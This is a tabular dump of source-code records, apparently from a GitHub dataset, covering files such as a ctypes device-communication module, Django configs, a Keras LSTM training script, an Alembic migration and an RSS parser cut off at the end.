blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
81e95253e7fc79ef1c6289862335413d5a76dbba | 7d38fb1baff08bb2f438f4b2c2972ef506bafcf9 | /cbi.py | 0923fc86360da717b7b2cb9bf4c1330cc7dafda5 | [] | no_license | rendinam/CBPM | a301eab02a9925782d02ecae99a2361a60646c4e | d3662f1279848da0bf8aea660ca8b062c3e47c17 | refs/heads/master | 2023-03-07T00:23:26.680674 | 2021-02-09T17:45:05 | 2021-02-09T17:45:05 | 337,477,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,502 | py | #----------------------------------------------
# Automatically generated python3 module code
# for core communication data structures.
#----------------------------------------------
from cbi_core import *
#---------------------------------------
# Necessary constants imported from
# header files.
#---------------------------------------
CBI_MAX_ERROR_WORDS = 4
CBI_MAX_TRACE_LEVELS = 15
CBI_MAX_DEBUG_WORDS = 660
#---------------------------------------
# Data type structures, used to compose
# various communication data structures.
#---------------------------------------
#---------------------------------------
# Communication data structure class
# definitions.
#---------------------------------------
class CMD(communication_struct):
_fields_ = [('cmd', c_int),
('cmd_status', c_int),
('error', c_int*CBI_MAX_ERROR_WORDS),
('handshake', c_int)]
def __init__(self, socketfd):
self.table_offset = 1
communication_struct.__init__(self, socketfd)
class STAT(communication_struct):
_fields_ = [('state', c_int),
('status', c_int),
('num_levels', c_int),
('trace', c_int*CBI_MAX_TRACE_LEVELS)]
def __init__(self, socketfd):
self.table_offset = 2
communication_struct.__init__(self, socketfd)
class DEBUG(communication_struct):
_fields_ = [('write_ptr', c_int),
('debug', c_int*CBI_MAX_DEBUG_WORDS),
('routine', c_int*CBI_MAX_DEBUG_WORDS),
('padding', c_int)]
def __init__(self, socketfd):
self.table_offset = 3
communication_struct.__init__(self, socketfd)
class IDENT(communication_struct):
_fields_ = [('ipaddr', c_char*16),
('hostname', c_char*28),
('module_type', c_int),
('fpga_maj', c_int),
('fpga_min', c_int),
('fe_fpga_id', c_int*4)]
def __init__(self, socketfd):
self.table_offset = 4
communication_struct.__init__(self, socketfd)
class HEARTBEAT(communication_struct):
_fields_ = [('heartbeat', c_int),
('timing_integrity', c_int),
('turns_seen', c_int)]
def __init__(self, socketfd):
self.table_offset = 5
communication_struct.__init__(self, socketfd)
class MODULE_CONFIG(communication_struct):
_fields_ = [('exe_type', c_int),
('exe_version', c_float),
('ldr_name', c_char*44),
('build_timestamp', c_int),
('core_comm_struct_rev', c_int),
('platform_comm_struct_rev', c_int),
('compiler_ver', c_int),
('lib_version', c_float),
('hardware_ver', c_int),
('firmware_ver', c_int)]
def __init__(self, socketfd):
self.table_offset = 6
communication_struct.__init__(self, socketfd)
class instrument(instrument_base):
"""Provides for instantiation of all core
instrumentation communication structures."""
def __init__(self, host):
instrument_base.__init__(self)
self.hostname = host
self.hostname_b = str.encode(host)
self.cmd = CMD(self.socketfd)
self.stat = STAT(self.socketfd)
self.debug = DEBUG(self.socketfd)
self.ident = IDENT(self.socketfd)
self.heartbeat = HEARTBEAT(self.socketfd)
self.module_config = MODULE_CONFIG(self.socketfd)
| [
"matt.rendina@gmail.com"
] | matt.rendina@gmail.com |
96f235f5684df134779fb924924785ed85bf2164 | e7b30d912e69f7b1d6a6f774ae4573c06859af2d | /Htube/wsgi.py | a2a9de939e8a4b8789ff4e74879fef8dc28be112 | [] | no_license | haiderAli62/Htube-video-streaming-django | ff4f2eb3b1a204caa5920f741f8538a90f201f88 | 3400ddb9ae7689a329f2932c20e25f051ddc6be2 | refs/heads/master | 2020-06-15T05:09:42.340309 | 2019-07-04T09:59:24 | 2019-07-04T09:59:24 | 195,211,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for Htube project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Htube.settings')
application = get_wsgi_application()
| [
"noreply@github.com"
] | noreply@github.com |
322b370d6d03d1c9bfafe46a87d7b9c8a55eaae6 | ce0f8956c4c308c67bd700d31fe8d5a17b16ac08 | /Python3/src/23 Miscellaneous Topics/PDF Manipulation/02_createWatermark.py | b055027b0fc51eb03efc7fb7e50e4af5484af4a7 | [] | no_license | seddon-software/python3 | 795ae8d22a172eea074b71d6cd49d79e388d8cc6 | d5e6db1509a25c1a3040d5ae82d757539a2ff730 | refs/heads/master | 2021-07-10T15:48:31.893757 | 2020-07-16T20:29:22 | 2020-07-16T20:29:22 | 175,872,757 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | from reportlab.pdfgen import canvas
point = 10
inch = 72
TEXT = "watermark"
def make_pdf_file(output_filename):
title = output_filename
h = 8.5 * inch
v = 11 * inch
grey = 0.9
c = canvas.Canvas(output_filename, pagesize=(h, v))
c.setStrokeColorRGB(0,0,0)
c.setFillColorRGB(grey, grey, grey)
c.setFont("Helvetica", 12 * point)
c.rotate(45)
c.translate(h/2, 0)
c.drawString(-h/8, 0, TEXT )
c.showPage()
c.save()
filename = "pdfs/watermark.pdf"
make_pdf_file(filename)
print(("Wrote", filename)) | [
"seddon-software@keme.co.uk"
] | seddon-software@keme.co.uk |
86cf72e4ffc437f064a8671c622efbf1c3f9babd | 5c34abe10630b23da8ba7d1cbce38bda53a4b6fa | /RootIo/SConscript | b7f1d62057e6edcdd59cf22dde00c661fb1f03ec | [] | no_license | fermi-lat/GlastRelease-scons-old | cde76202f706b1c8edbf47b52ff46fe6204ee608 | 95f1daa22299272314025a350f0c6ef66eceda08 | refs/heads/master | 2021-07-23T02:41:48.198247 | 2017-05-09T17:27:58 | 2017-05-09T17:27:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | # -*- python -*-
# $Header$
# Authors: Heather Kelly <heather@milkyway.gsfc.nasa.gov>, David Chamont <chamont@poly.in2p3.fr>
# Version: RootIo-26-01-03
Import('baseEnv')
Import('listFiles')
Import('packages')
progEnv = baseEnv.Clone()
libEnv = baseEnv.Clone()
libEnv.Tool('addLinkDeps', package='RootIo', toBuild='component')
RootIo =libEnv.ComponentLibrary('RootIo',
listFiles(['src/*.cxx']))
progEnv.Tool('RootIoLib')
if baseEnv['PLATFORM'] == 'win32':
progEnv.AppendUnique(CPPDEFINES = ['GLEAM'])
progEnv.AppendUnique(CPPDEFINES = ['__i386'])
progEnv.AppendUnique(CPPDEFINES = ['EFC_FILTER'])
progEnv.AppendUnique(CPPDEFINES = ['_WIN32'])
test_RootIo = progEnv.GaudiProgram('test_RootIo',
listFiles(['src/test/*.cxx']), test = 1,
package='RootIo')
progEnv.Tool('registerTargets', package = 'RootIo',
libraryCxts=[[RootIo,libEnv]],testAppCxts=[[test_RootIo,progEnv]],
includes = listFiles(['RootIo/*.h']),
jo = listFiles(['src/*.txt', 'src/test/*.txt']))
| [
""
] | ||
23946605d8fdc78913a7ec206ccf8d74fde4c824 | c9ce0cf9c193ebe35c31b39bba11d698a950bbf1 | /nico/test_nico.py | 384754e971255ba9dcd2e6bbf432961aff323068 | [] | no_license | KhlopotovAI/codewars-py | 93f89e3f62edd92acf76faa7ba212029206cc4f6 | 16a1eee25f35f7ccaead595e011963f0911dda4c | refs/heads/master | 2020-04-26T04:21:32.730010 | 2019-07-13T07:17:29 | 2019-07-13T07:17:29 | 173,299,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | from unittest import TestCase
from .kata import nico
class TestNico(TestCase):
def test_nico(self):
self.assertEqual("cseerntiofarmit on ", nico("crazy", "secretinformation"))
self.assertEqual("abcd ", nico("abc", "abcd"))
self.assertEqual("2143658709", nico("ba", "1234567890"))
self.assertEqual("message", nico("a", "message"))
self.assertEqual("eky", nico("key", "key"))
self.assertEqual("abcd ", nico("abcdefgh", "abcd"))
| [
"akhlopotov@list.ru"
] | akhlopotov@list.ru |
377669007b7547803f582137ed3be4c23f4a71d3 | f7b1bd000d9483343f915f057ac8e36a2de78334 | /experiment-2/BiDirectionalLSTM.py | cc69df9abe5f2ea80a07b3795efeb7b9a28f60fe | [] | no_license | spencergritton/Time-Series-Predictions | 511ded04f88e296eb4d30b98f58ac29c9d7e4668 | 76dcc7c61cd61b7c231796abee6ea5b3c4f870d8 | refs/heads/master | 2021-09-28T06:01:57.439727 | 2020-05-13T04:07:56 | 2020-05-13T04:07:56 | 251,520,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,916 | py | import os
import os.path
import numpy as np
from matplotlib import pyplot as plt
import matplotlib.patches as mpatches
import pickle
import time
import random
import pandas as pd
import tensorflow as tf
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import LSTM, Dense, Bidirectional, Input, Dropout, BatchNormalization, TimeDistributed
from tensorflow.keras.layers import Layer, InputSpec
from tensorflow.keras.callbacks import TensorBoard, TerminateOnNaN, ReduceLROnPlateau, EarlyStopping, ModelCheckpoint
from tensorflow.keras.optimizers import RMSprop, Adadelta
from tensorflow.keras import regularizers
# Set reproducable seed values to compare each experiment based on their outputs and not seed values
# The below is necessary for starting Numpy generated random numbers
# in a well-defined initial state.
# https://keras.io/getting-started/faq/#how-can-i-obtain-reproducible-results-using-keras-during-development
tf.random.set_seed(33)
os.environ['PYTHONHASHSEED'] = str(33)
np.random.seed(33)
random.seed(33)
session_conf = tf.compat.v1.ConfigProto(
intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1
)
sess = tf.compat.v1.Session(
graph=tf.compat.v1.get_default_graph(),
config=session_conf
)
tf.compat.v1.keras.backend.set_session(sess)
# Dataset
dataset = 'BTC_180_30'
# Open dataset from pickle file
pickle_in = open(f"{dataset}.pickle", "rb")
data = pickle.load(pickle_in)
pickle_in.close()
train, test, parameters = data
trainX, trainY = train
testX, testY = test
# Model name
model_name = 'BiDirectionalLSTM_BTC_180_30'
# Hyper params
DROPOUT = 0.5
EPOCHS = 100
BATCH_SIZE = 64
OPTIMIZER = Adadelta(learning_rate=1.0, rho=0.95)
optimizer_str = 'Adadelta: learning_rate=1.0, rho=0.95'
REGULARIZATION = regularizers.l2(0.01)
regularization_str = 'l2: 0.01, output penalty "activity"'
# Dataset data
INPUT_LEN = parameters['input_len']
OUTPUT_LEN = parameters['output_len']
standardization = parameters['standardization']
# Build the model
# Thanks to https://stackoverflow.com/questions/43034960/many-to-one-and-many-to-many-lstm-examples-in-keras
# for showing how to make a MANY TO MANY model in Keras
model = Sequential()
model.add( Bidirectional(LSTM(INPUT_LEN, input_shape=(trainX.shape[1:]), return_sequences=False, activity_regularizer=REGULARIZATION)) )
model.add( Dropout(DROPOUT) )
model.add( BatchNormalization() )
model.add( Dense(INPUT_LEN, activation='relu', activity_regularizer=REGULARIZATION) )
model.add( Dropout(DROPOUT) )
model.add( BatchNormalization() )
model.add( Dense(OUTPUT_LEN, activation='linear') )
model.compile(loss="mse",
optimizer=OPTIMIZER,
metrics=['mae'])
# Time callback for tracking epoch training times, from: https://stackoverflow.com/questions/43178668/record-the-computation-time-for-each-epoch-in-keras-during-model-fit
class TimeHistory(tf.keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.times = []
def on_epoch_begin(self, epoch, logs={}):
self.epoch_time_start = time.time()
def on_epoch_end(self, epoch, logs={}):
self.times.append(time.time() - self.epoch_time_start)
# Callbacks
terminateOnNan = TerminateOnNaN()
earlyStopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=6, verbose=1, mode='min', baseline=None, restore_best_weights=True)
reduceOnPlateau = ReduceLROnPlateau(monitor='val_loss', factor=0.6, patience=2, min_lr=0.001)
modelCheckpoint = ModelCheckpoint(f'checkpoints/{model_name}.h5', monitor='loss', verbose=0, save_best_only=True, mode='min')
tensorboard = TensorBoard(log_dir=f'logs/{model_name}')
time_callback = TimeHistory()
# Train model
history = model.fit(
trainX, trainY,
epochs=EPOCHS,
validation_data=(testX, testY),
batch_size=BATCH_SIZE,
shuffle=True,
callbacks=[
terminateOnNan,
earlyStopping,
reduceOnPlateau,
modelCheckpoint,
tensorboard,
time_callback
],
)
# Generate chart
# Using this as assistance:
# https://cmdlinetips.com/2019/10/how-to-make-a-plot-with-two-different-y-axis-in-python-with-matplotlib/
fig,ax=plt.subplots()
# Primary Axis Labels
ax.set_xlabel("Epochs")
ax.set_ylabel("Loss (MSE)")
# Primary axis data
ax.plot( history.history['loss'], color="orange" )
ax.plot( history.history['val_loss'], color="red" )
# Secondary axis data and labels
ax2=ax.twinx()
ax2.plot( history.history['lr'], color="blue" )
ax2.set_ylabel("Learning Rate" )
# Legend
loss_patch = mpatches.Patch(color='orange', label='Train Loss')
val_loss_patch = mpatches.Patch(color='red', label='Val Loss')
lr_patch = mpatches.Patch(color='blue', label='Learning Rate')
plt.legend(handles=[loss_patch, val_loss_patch, lr_patch])
plt.rcParams["legend.fontsize"] = 12
plt.title(model_name, loc='center')
plt.show()
# save the plot as a file
fig.savefig(f'plots/{model_name}.png', format='png', dpi=250, bbox_inches='tight')
# Store model data to csv for analysis
filePath = 'ml-results.csv'
csvColumns = "Name,Val_Loss,Val_Mae,Epochs_Scheduled,Epochs_Ran,Training_Time(Mins),Input_Len,Output_Len,Batch_Size,Optimizer,Regularization,Dropout"
if not os.path.isfile(filePath):
f = open(filePath, "a")
f.write(csvColumns)
f.close()
df = pd.read_csv(filePath)
df = df[csvColumns.split(',')]
score = model.evaluate(testX, testY, verbose=0)
csvRow = {
'Name': model_name, 'Val_Loss': score[0], 'Val_Mae': score[1],
'Epochs_Scheduled': EPOCHS, 'Epochs_Ran': len(history.history['loss']),
'Training_Time(Mins)': sum(time_callback.times)/60, 'Input_Len': INPUT_LEN, 'Output_Len': OUTPUT_LEN,
'Batch_Size': BATCH_SIZE, 'Optimizer': optimizer_str, 'Regularization': regularization_str,
'Dropout': DROPOUT
}
df = df.append(csvRow, ignore_index=True)
df.to_csv(path_or_buf=filePath, index=False)
print('model-results.csv updated') | [
"SpencerGritton@Spencers-MBP.lan"
] | SpencerGritton@Spencers-MBP.lan |
03b2064a1b169b166d88744f2437bf69ef5cbf8d | c7e37db2fb70358d8ad178efa0a2862161ef1af4 | /backend/migrations/versions/522c2917c182_.py | fa4ddf2deb33dd7ea6d5cc72a5992aaabd1e84c4 | [
"MIT"
] | permissive | JohnDamilola/URL-Shortener-2.0 | 9ef2b5af096b842f0d1763a143bf840908c98c82 | 7413928b7de6acb0230c09e5d3eaa748ebb6287b | refs/heads/main | 2023-04-14T00:09:41.708237 | 2022-12-06T03:04:01 | 2022-12-06T03:04:01 | 561,389,222 | 1 | 1 | MIT | 2022-12-04T20:09:51 | 2022-11-03T15:29:17 | TypeScript | UTF-8 | Python | false | false | 1,865 | py | """empty message
Revision ID: 522c2917c182
Revises: ca5354b4cc9e
Create Date: 2022-11-23 12:52:31.176215
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '522c2917c182'
down_revision = 'ca5354b4cc9e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('links',
sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('stub', sa.String(length=100), nullable=False),
sa.Column('long_url', sa.String(length=2083), nullable=False),
sa.Column('title', sa.String(length=100), nullable=False),
sa.Column('disabled', sa.Boolean(), nullable=False),
sa.Column('utm_source', sa.String(length=100), nullable=True),
sa.Column('utm_medium', sa.String(length=100), nullable=True),
sa.Column('utm_campaign', sa.String(length=100), nullable=True),
sa.Column('utm_term', sa.String(length=100), nullable=True),
sa.Column('utm_content', sa.String(length=100), nullable=True),
sa.Column('password_hash', sa.String(), nullable=True),
sa.Column('expire_on', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),
sa.Column('created_on', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=False),
sa.Column('updated_on', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=False),
sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('stub')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('links')
# ### end Alembic commands ###
| [
"johndamilola03@gmail.com"
] | johndamilola03@gmail.com |
3d98ad2af60c8f5391c53f249b2be5d49e4a5712 | 28df46f33feb507577e41f1140334d27f14f510c | /forgerock-auth-filters/branches/1.3/forgerock-authn-filter/forgerock-jaspi-robot-tests/variables.py | 564207c3a023a5345207442a7d10072b5d4d1b10 | [] | no_license | deepakchanalia/forgerock-commons | 3dc5c0ac6c541ac2f5fbbe8fdf79b21e90bc8a5e | dd83127c17428e9397a568b3eaac46a72d1aa087 | refs/heads/master | 2021-01-11T21:00:12.193770 | 2015-07-23T22:46:14 | 2015-07-23T22:46:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | ###########################
# MANDATORY CUSTOMISATION #
###########################
# location of JASPI runtime jar
JASPI_TEST_SERVER_WAR_PATH = '/Users/Phill/ForgeRockDev/tmp-old-repos/forgerock-commons-auth-filters-1.3.0/forgerock-commons-auth-filters-1.3.0/forgerock-authn-filter/forgerock-jaspi-test-server/target/jaspi.war'
# location of apache tomcat directory
TOMCAT_ZIP_PATH = '/Users/Phill/ForgeRockDev/tmp-old-repos/forgerock-commons-auth-filters-1.3.0/forgerock-commons-auth-filters-1.3.0/forgerock-authn-filter/forgerock-jaspi-robot-tests/resources/apache-tomcat-6.0.37.zip'
# location of the
DEPLOY_PATH = '/Users/Phill/ForgeRockDev/tmp-old-repos/forgerock-commons-auth-filters-1.3.0/forgerock-commons-auth-filters-1.3.0/forgerock-authn-filter/forgerock-jaspi-robot-tests/deploy'
##############################
# OPTIONAL CUSTOMISATION #
# DEFAULT VALUES CAN BE USED #
##############################
# location of empty exploded war directory
#EXPLODED_WAR_PATH = '/Users/Phill/ForgeRockDev/commons/forgerock-auth-filters-robot/forgerock-auth-filters-robot/templates/exploded-war'
DEBUG = 'true' | [
"phillcunnington@ca16bcf9-9eb2-46e4-97b8-9b07c30c95dc"
] | phillcunnington@ca16bcf9-9eb2-46e4-97b8-9b07c30c95dc |
c7a04b037644a21f6b2eb0ec0be6fbe5139ab9fe | d029f315bc22fd48566df819ec8f5e28b2c11cbc | /wave_app/uploader/urls.py | 59824ba2cbae2ad55ab4547d4731a1136450c775 | [] | no_license | Onjrew/se-challenge | 35a9fbc7a05d39c9a2460a00bc32047beed9c420 | c18e46a7198511c9bc1ddc40c9b80e772bd15287 | refs/heads/master | 2020-06-12T16:03:03.294338 | 2016-12-07T03:31:48 | 2016-12-07T03:31:48 | 75,795,894 | 0 | 0 | null | 2016-12-07T03:32:45 | 2016-12-07T03:32:45 | null | UTF-8 | Python | false | false | 299 | py | from django.conf.urls import url
from . import views
app_name = 'uploader'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^upload', views.upload, name='upload'),
url(r'^totals', views.totals, name='totals'),
url(r'^parse_csv', views.parse_csv, name='parse_csv'),
]
| [
"andrew.scott.ferguson@gmail.com"
] | andrew.scott.ferguson@gmail.com |
93fcbf474fda2d35b532f00d1d4261cb7d961531 | 145c9faee52e69f1f7b1cf6b9ac84facf7819911 | /userSorter/user_file_builder.py | faa2b4a28e1e66eb4218d67769ca900d976cb69a | [] | no_license | zafodB/HealthData | 63ddde8efa6e6ceb2f924502b6eb714381d4e935 | 2359b9997816c6b5ae39879641e99eb0c09384be | refs/heads/master | 2022-04-04T18:05:43.394547 | 2020-01-29T20:07:54 | 2020-01-29T20:07:54 | 201,798,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,096 | py | '''
Structure:
{
"username":"someone",
"url":"123465",
"status":"very eHealthy"
"weburl": "http://..."
"posts":{
"342823":{
"date":"23-11-2011",
"title":"pregnancy problem",
"text":"this is a sample post",
"category":"pregnancy",
"status":"newPost"
},
"342887":{
"date":"24-11-2011",
"title":"my child is sick",
"text":"this is another post",
"category":"child health",
"status":"reply"
}
},
}
'''
import json, os
import datetime
from dateutil.parser import *
starting_directories = []
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/2/")
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/3/")
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/4/")
starting_directories.append("/scratch/GW/pool0/fadamik/healthboards/sorted/5/")
# starting_directory = "D:/Downloads/json/healthboards/" + "6/"
# output_directory = "D:/Downloads/json/healthboards/" + "6-sorted/"
output_directory = "/scratch/GW/pool0/fadamik/healthboards/users/"
# if not os.path.isdir(output_directory):
# os.mkdir(output_directory)
def write_out_users(users):
for user in users:
user_folder_name = str(user // 100)
if not os.path.isdir(os.path.join(output_directory, user_folder_name)):
os.mkdir(os.path.join(output_directory, user_folder_name))
full_path = os.path.join(output_directory, user_folder_name, str(user) + ".json")
user_file_json = {}
if os.path.exists(full_path):
user_file = open(full_path, "r", encoding="utf8")
user_contents = user_file.read()
user_file_json = json.loads(user_contents)
user_file.close()
user_file_json.update(users[user])
user_file = open(full_path, "w", encoding="utf8")
json.dump(user_file_json, user_file)
user_file.close()
return None
def process_files(starting_directory):
processed_files = 0
users = {}
for root, dirs, files in os.walk(starting_directory):
for file_name in files:
try:
file = open(os.path.join(root, file_name), "r", encoding="utf8")
contents = file.read()
file_as_json = json.loads(contents)
file.close()
document_id = file_as_json['docid'] * 10
category = file_as_json['commonCategory']
title = file_as_json['title']
original_poster_id = file_as_json['createdBy']['url']
users[original_poster_id] = {'name': file_as_json['createdBy']['name'],
'status': file_as_json['createdBy']['status']}
answer_nr = 1
for answer in file_as_json['answers']:
activity_nr = document_id + answer_nr
if 'description' not in answer:
continue
if answer_nr == 1:
users[original_poster_id]['activity'] = {activity_nr: {}}
users[original_poster_id]['activity'][activity_nr]['title'] = title
users[original_poster_id]['activity'][activity_nr]['description'] = answer['description']
users[original_poster_id]['activity'][activity_nr]['pubDate'] = parse(answer['pubDate']).isoformat()
users[original_poster_id]['activity'][activity_nr]['category'] = category
users[original_poster_id]['activity'][activity_nr]['newPost'] = True
else:
user_id = answer['createdBy']['url']
if user_id not in users:
users[user_id] = {'name': answer['createdBy']['name'], 'status': answer['createdBy']['status'],
'activity': {activity_nr: {}}}
else:
users[user_id]['activity'][activity_nr] = {}
users[user_id]['activity'][activity_nr]['title'] = title
users[user_id]['activity'][activity_nr]['description'] = answer['description']
users[user_id]['activity'][activity_nr]['pubDate'] = None
users[user_id]['activity'][activity_nr]['category'] = category
users[user_id]['activity'][activity_nr]['newPost'] = False
answer_nr += 1
processed_files += 1
if processed_files % 1000 == 0:
print("Processed files: " + str(processed_files))
write_out_users(users)
users = {}
# print(users)
except Exception as e:
print("Error processing file: " + file_name + ": " + str(e))
if users:
write_out_users(users)
for directory in starting_directories:
process_files(directory)
| [
"filiplama@gmail.com"
] | filiplama@gmail.com |
b2a671dfca5e7fc447b993c10a529875dc54603f | c7061fb106b801c12fb40ff331d927a5bb24da80 | /BasicExerciseAndKnowledge/w3cschool/n16_format_datetime.py | b0f4e62a46fdd8c480a544be789ecdafb00a1d3a | [
"MIT"
] | permissive | Jonathan1214/learn-python | 34e6b5612beeb1a46b5964b0a4e306656355fe84 | 19d0299b30e953069f19402bff5c464c4d5580be | refs/heads/master | 2020-03-27T09:03:16.785034 | 2018-08-31T02:48:34 | 2018-08-31T02:48:34 | 146,310,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #coding:utf-8
# 题目:输出指定格式的日期
import time
import datetime
# 目的在于熟悉这个模块
print time.ctime() # localtime
print time.asctime(time.localtime())
print time.asctime(time.gmtime()) # gmt
print datetime.datetime(2018, 8, 12)
# print datetime.tzinfo
print datetime.date.today()
print datetime.date.fromtimestamp.__doc__ | [
"jonathan1214@foxmail.com"
] | jonathan1214@foxmail.com |
fc88ba2c959cbb2126c1a6c8c7c8164e058a2dd8 | af25301cb505594b63dba2753c394e1660263e36 | /plot_ccf.py | 8360a3f180557cc2540ec7d5ad5fa753d270b01a | [] | no_license | nzarifi/tsmodels | 03229338d510daea3002bc03cabdc5c70bba658c | 243b8ff730d7c8817d2a3f292c040b8762ed2032 | refs/heads/master | 2023-02-02T01:02:12.035018 | 2020-12-15T13:25:57 | 2020-12-15T13:25:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,590 | py | import numpy as np
import pandas as pd
from math import sqrt
import matplotlib.pyplot as plt
def plot_ccf(x, y, lags=20, figsize=(14,6)):
'''
This function plots the cross correlation between two time series.
'''
xname = pd.DataFrame(x).columns.values[0]
yname = pd.DataFrame(y).columns.values[0]
corr = np.array([x.corr(y.shift(i)) for i in range(-lags, lags)])
# CALCULATING THE STANDARD ERROR AND THE CONFIDENCE INTERVALS
right = np.array([sqrt((1/len(x)) * (1 + 2 * sum(corr[:i]**2))) * 1.96 for i in range(1,lags+1)])
lower_right = -right
upper_right = right
left = np.array([sqrt((1/len(x)) * (1 + 2 * sum(corr[-i::]**2))) * 1.96 for i in range(1,lags+1)])
lower_left = -left[::-1]
upper_left = left[::-1]
# PLOTING THE CORRELATION
plt.figure(figsize=figsize)
plt.stem(corr,linefmt='cornflowerblue', markerfmt='bo', basefmt='cornflowerblue', label='Corr. Cruzada', use_line_collection=True)
plt.vlines(len(corr)/2, ymax=corr.max(), ymin=corr.min(), color='black', lw=3, alpha=1, label='Base Zero')
plt.plot(corr.argmax(),corr.max(), 'o', markersize=8, color='red', label=f'Max Lag {int(len(corr)/2)-corr.argmax()}')
plt.fill_between(range(lags,lags*2), lower_right,
upper_right, alpha=0.25, color='cornflowerblue')
plt.fill_between(range(1,lags+1), lower_left,
upper_left, alpha=0.25, color='cornflowerblue')
plt.title(f'Correlation Between {xname} and {yname} with {lags} lags')
plt.legend()
plt.show() | [
"noreply@github.com"
] | noreply@github.com |
71bbfff45e7ae85a6330b07e06dfb3bae056f560 | c7e9ee96c2a890aff28a0370146007d1ee62150e | /moviesite/analysitcs/models.py | fccd0d685a19a5e498813f58dce46017ddcd0428 | [] | no_license | ishikawa407/Moviesite | 768761724b4519d4ee2d4990adbf92d646f76573 | 56d2f04be9dc8b2f828a1a2444866ee90d726ed2 | refs/heads/master | 2022-12-10T10:15:46.109292 | 2019-07-14T15:27:37 | 2019-07-14T15:27:37 | 196,013,042 | 0 | 0 | null | 2022-12-08T01:22:36 | 2019-07-09T13:20:52 | HTML | UTF-8 | Python | false | false | 683 | py | from django.db import models
class Rating(models.Model):
user_id = models.CharField(max_length=16)
movie_id = models.CharField(max_length=16)
rating = models.DecimalField(decimal_places=2, max_digits=4)
rating_timestamp = models.DateTimeField()
type = models.CharField(max_length=8, default='explicit')
def __str__(self):
return "user_id: {}, movie_id: {}, rating: {}, type: {}" \
.format(self.user_id, self.movie_id, self.rating, self.type)
class Cluster(models.Model):
cluster_id = models.IntegerField()
user_id = models.IntegerField()
def __str__(self):
return "{} in {}".format(self.user_id, self.cluster_id)
| [
"shimeng407@gmail.com"
] | shimeng407@gmail.com |
a1f44f892947d2880844171869bd61cf7fc59208 | 50cc8ba16cf08ecd5850440d34058c1abb05157b | /xml-parser-barrapunto.py | dda7852af16da98776f48ee23a4223e73602785b | [] | no_license | imfar/X-Serv-XML-Barrapunto | 243c648662a879689445156de9ccb37a9beb5197 | d796ab9e0f7eb15a10893d9f991b9fafe457d303 | refs/heads/master | 2020-03-13T14:32:59.020377 | 2018-04-26T18:25:44 | 2018-04-26T18:25:44 | 131,160,679 | 0 | 0 | null | 2018-04-26T13:35:24 | 2018-04-26T13:35:23 | null | UTF-8 | Python | false | false | 1,691 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Simple XML parser for the RSS channel from BarraPunto
# Jesus M. Gonzalez-Barahona
# jgb @ gsyc.es
# TSAI and SAT subjects (Universidad Rey Juan Carlos)
# September 2009
#
# Just prints the news (and urls) in BarraPunto.com,
# after reading the corresponding RSS channel.
from xml.sax.handler import ContentHandler
from xml.sax import make_parser
import sys
class myContentHandler(ContentHandler):
def __init__ (self):
self.inItem = False
self.inContent = False
self.theContent = ""
def startElement (self, name, attrs):
if name == 'item':
self.inItem = True
elif self.inItem:
if name == 'title':
self.inContent = True
elif name == 'link':
self.inContent = True
def endElement (self, name):
global title
if name == 'item':
self.inItem = False
elif self.inItem:
if name == 'title':
title = self.theContent
self.inContent = False
self.theContent = ""
elif name == 'link':
link = "<a href='" + self.theContent + "'>" + title + "</a><br>"
fd.write(link)
self.inContent = False
self.theContent = ""
def characters (self, chars):
if self.inContent:
self.theContent = self.theContent + chars
# Abrir archivo html y escribir en el codigo html
fd = open('index.html', 'w')
html_code = "<html><body><h1>PRACTICA SARO - 10.3. Titulares de BarraPunto</h1><p>"
